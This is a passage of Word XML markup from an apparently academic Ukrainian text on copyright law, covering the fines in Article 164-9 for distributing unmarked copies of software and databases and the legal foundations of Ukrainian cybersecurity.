          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> подають до Установи: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F6D4DF" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="006A221B" w:rsidRDefault="00BA24D7" w:rsidP="00BA24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eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:tab/>
        <w:t>е) копію договору про передачу</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (відчуження) майнових прав авторів і (або) суб'єктів суміжних прав або договори про  передачу прав на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>використання баз  даних шляхом їх відтворення</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> та </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>розповсюдження примірників,</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> починаючи з договору, за яким майнові </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>права авторів і (або) суб'єктів суміжних прав</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> або</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> права </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">використання передаються на територію України, </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>або починаючи з договору, за яким майнові права авторів і (або) суб'єктів суміжних прав або права на використання передаються від первинних суб'єктів авторського права і (або) суміжних прав (у  разі  виникнення  цих п</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">рав   на  території  України). </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Заявни</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> подає копії </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">зазначених </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>договорів, а також оригінал договору, за яким</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> безпосередньо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>заявникові передаються майнові права</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> авторів і (або) суб'єктів суміжних прав або прав</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>а на використання баз даних.</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> До </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>договорів, складених іноземною</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">мовою, додаються їх </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">переклади українською мовою, посвідчені в установленому порядку; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25516B52" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="000E1A43" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1A43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Відповідно внесено зміни до законодавчих актів України: </w:t>
      </w:r>
      <w:bookmarkStart w:id="25" w:name="o120"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="000E1A43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1) статтю 164-9 Кодексу України про</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> адміністративні </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1A43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">правопорушення </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA24D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="_blank" w:history="1">
        <w:r w:rsidRPr="00BA24D7">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="auto"/>
            <w:sz w:val="28"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>80731-10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA24D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="_blank" w:history="1">
        <w:r w:rsidRPr="00BA24D7">
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:color w:val="auto"/>
            <w:sz w:val="28"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>80732-10</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BA24D7">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> ) </w:t>
      </w:r>
      <w:r w:rsidRPr="000E1A43">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">(Відомості Верховної Ради УРСР, 1984 р., додаток до N 51, ст. 1122)  викласти в такій редакції: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8EE974" w14:textId="77777777" w:rsidR="00BA24D7" w:rsidRPr="00BA5269" w:rsidRDefault="00BA24D7" w:rsidP="00BA24D7">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA5269">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Стаття</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5269">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 164-9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5269">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA5269">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Незаконне розповсюдження примірників аудіовізуальних творів, фонограм, відеограм, комп'ютерних програм, баз даних </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689ED79D" w14:textId="4A544B96" w:rsidR="00BA24D7" w:rsidRDefault="00BA24D7" w:rsidP="00BA24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bookmarkStart w:id="26" w:name="o122"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>Розповсюдження прим</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>ірників аудіовізуальних творів,</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> фонограм, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>відеограм,</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> комп</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">'ютерних програм, баз даних, упаковки яких </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>не марковані контрольними марками або марковані контрольними марками, що мают</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>ь серію чи містять інформацію, які не відповідають</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> носію </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>цього примірника, або номер, який</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> не відповідає даним Єдиного реєстру одержувачів контрольних марок, - </w:t>
      </w:r>
      <w:bookmarkStart w:id="27" w:name="o123"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>тягне за собою</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> накладенн</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> штрафу від десяти до ста </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">неоподатковуваних мінімумів доходів </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">громадян з конфіскацією цих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">примірників аудіовізуальних творів, фонограм, </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">відеограм, комп'ютерних програм, баз даних. </w:t>
      </w:r>
      <w:bookmarkStart w:id="28" w:name="o124"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Та сама дія, вчинена особою, </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>яку протягом року було піддано адміністративному стяг</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ненню за одне з правопорушень, </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">зазначених у частині першій цієї статті, - </w:t>
      </w:r>
      <w:bookmarkStart w:id="29" w:name="o125"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>тягне за собою накладення</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> штрафу від п'ятдесяти до двохсот неоподатковуваних</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> мінімумів доходів громадян  з конфіскацією </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">цих </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>примірників аудіовізуальних творів, фонограм,</w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> відеограм, комп'ютерних програм, баз даних"; </w:t>
      </w:r>
      <w:r w:rsidRPr="006A221B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>[15].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A454E32" w14:textId="534CE1EB" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Правову основу забезпечення кібербезпеки України становлять Конституція України, закони України щодо основ національної безпеки, засад внутрішньої і зовнішньої політики, електронних комунікацій, захисту державних інформаційних ресурсів та інформації, вимога щодо захисту якої встановлена законом, цей та інші закони України, Конвенція про кіберзлочинність, інші міжнародні договори, згода на обов’язковість яких надана Верховною Радою України, укази Президента України, акти Кабінету Міністрів України, а також інші нормативно-правові акти, що приймаються на виконання законів України</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [18]</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5B0DA" w14:textId="2CAC7EF5" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Під </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="Інформація">
        <w:r w:rsidRPr="0096070A">
          <w:rPr>
            <w:rStyle w:val="ListLabel39"/>
            <w:rFonts w:eastAsia="DejaVu Sans"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>інформаційною</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> безпекою розуміється захищеність інформації та підтримує її інфраструктури від будь-яких випадкових або зловмисних дій, результатом яких може з'явитися нанесення збитку самої інформації, її власникам або підтримуючої інфраструктурі.  Забезпечення захисту інформації є обов'язковою умовою успішного функціонування будь-якого підприємства</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [18]</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EE6920" w14:textId="06E895A9" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Відповідно до Закону України «Про основні засади забезпечення кібербезпеки України» об’єктами кіберзахисту є: комунікаційні системи всіх форм власності, в яких обробляються національні інформаційні ресурси та/або які використовуються в інтересах органів державної влади, органів місцевого самоврядування, правоохоронних органів та військових формувань, утворених відповідно до закону; об’єкти критичної інформаційної інфраструктури; комунікаційні системи, які використовуються для задоволення суспільних потреб та/або реалізації правовідносин у сферах електронного урядування, електронних державних послуг, електронної комерції, електронного документообігу</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [18]</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43A080" w14:textId="3B4E5B42" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Цей Закон також надає взаємопов'язане визначення об'єкт критичної інформаційної інфраструктури: комунікаційна або технологічна система об'єкта критичної інфраструктури, </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="Кібератака">
        <w:r w:rsidRPr="0096070A">
          <w:rPr>
            <w:rStyle w:val="ListLabel39"/>
            <w:rFonts w:eastAsia="DejaVu Sans"/>
            <w:lang w:val="uk-UA"/>
          </w:rPr>
          <w:t>кібератака</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> на яку безпосередньо вплине на стале функціонування такого об'єкта критичної інфраструктури</w:t>
      </w:r>
      <w:r w:rsidR="00FB6169" w:rsidRPr="00FB6169">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> [18]</w:t>
      </w:r>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79715152" w14:textId="77777777" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Також в цьому Законі вказано, що суб’єкти забезпечення кібербезпеки у межах своєї компетенції:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B49BCB1" w14:textId="77777777" w:rsidR="0096070A" w:rsidRPr="0096070A" w:rsidRDefault="0096070A" w:rsidP="0096070A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="n76"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="0096070A">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="uk-UA"/>
        </w:rPr>
        <w:t>здійснюють заходи щодо запобігання використанню кіберпростору у воєнних, розвідувально-підривних, терористичних та інших протиправних і злочинних цілях;</w:t>
      </w:r>
    </w:p>
